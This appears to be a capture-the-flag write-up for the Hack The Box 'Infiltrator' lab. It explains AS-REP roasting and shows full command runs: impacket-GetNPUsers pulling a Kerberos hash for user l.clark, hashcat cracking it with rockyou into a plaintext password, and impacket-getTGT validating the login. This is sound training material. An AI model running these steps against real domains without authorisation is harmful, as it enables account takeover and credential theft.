ASREPRoasting
ASREPRoast is a security attack that exploits users who lack the Kerberos pre-authentication required attribute. Essentially, this vulnerability allows attackers to request authentication for a user from the Domain Controller (DC) without needing the user’s password. The DC then responds with a message encrypted with the user’s password-derived key, which attackers can attempt to crack offline to discover the user’s password.
The main requirements for this attack are;
- Lack of Kerberos pre-authentication: Target users must not have this security feature enabled.
- Connection to the Domain Controller (DC): Attackers need access to the DC to send requests and receive encrypted messages.
- Optional domain account: Having a domain account allows attackers to more efficiently identify vulnerable users through LDAP queries. Without such an account, attackers must guess usernames.
A total of 7 valid domain user has been enumerated viaBrute_Force_Attack with kerbrute
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-GetNPUsers INFILTRATOR.HTB/@dc01.infiltrator.htb -request -usersfile users.txt -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[-] User a.walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@INFILTRATOR.HTB:8993011ccbd1ac64d2b62f57e2a6a23d$41f40af5e5e984f4cc68ee2bf0c23b8a2f3e255064bf606c138e5598168c13193edad6ecb260181390c9ebc357e57727865733803c6ab47dea102a167d3a23299ea7c154b0797d919569a771d8d493c7b18a2100828476bd818edbefb89f3ed56984acc17c3b0ec404d5faf98766e4ed29cf6023194a5c4ef8913a9bd61a04c12bee75b6ee1c2ef847446bec04e80b4d5dc9fca447574afe55b2314dcb4b2aef4d971780d51c11ec16dbb51b2585b99c8c7f06bfd556ae90c5bd8ab8d33ddc6e9eeee16b87b0e946a6d8477b5f3436140a33b0333b973473d0fa410a489158029a0635eb02406ba240d61e575d82edaee013Found a user with dont_req_preauth set; l.clark
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ hashcat --show l.clark.hash
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ hashcat -a 0 -m 18200 l.clark.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Host memory required for this attack: 3 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$l.clark@INFILTRATOR.HTB:8993011ccbd1ac64d2b62f57e2a6a23d$41f40af5e5e984f4cc68ee2bf0c23b8a2f3e255064bf606c138e5598168c13193edad6ecb260181390c9ebc357e57727865733803c6ab47dea102a167d3a23299ea7c154b0797d919569a771d8d493c7b18a2100828476bd818edbefb89f3ed56984acc17c3b0ec404d5faf98766e4ed29cf6023194a5c4ef8913a9bd61a04c12bee75b6ee1c2ef847446bec04e80b4d5dc9fca447574afe55b2314dcb4b2aef4d971780d51c11ec16dbb51b2585b99c8c7f06bfd556ae90c5bd8ab8d33ddc6e9eeee16b87b0e946a6d8477b5f3436140a33b0333b973473d0fa410a489158029a0635eb02406ba240d61e575d82edaee013:WAT?watismypass!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$l.clark@INFILTRATOR.HTB:8993011ccbd1a...aee013
Time.Started.....: Sun Sep 1 00:33:47 2024 (3 secs)
Time.Estimated...: Sun Sep 1 00:33:50 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3728.4 kH/s (1.90ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10506240/14344385 (73.24%)
Rejected.........: 0/10506240 (0.00%)
Restore.Point....: 10493952/14344385 (73.16%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: WellHelloNow -> W14233LTKM
Hardware.Mon.#1..: Util: 52%
Started: Sun Sep 1 00:33:32 2024
Stopped: Sun Sep 1 00:33:50 2024hashcat cracked the password hash for the l.clark user; WAT?watismypass!
Credential must be validated
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/l.clark@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: WAT?watismypass!
[*] Saving ticket in l.clark@dc01.infiltrator.htb.ccacheSuccessfully validated
TGT generated for the l.clark user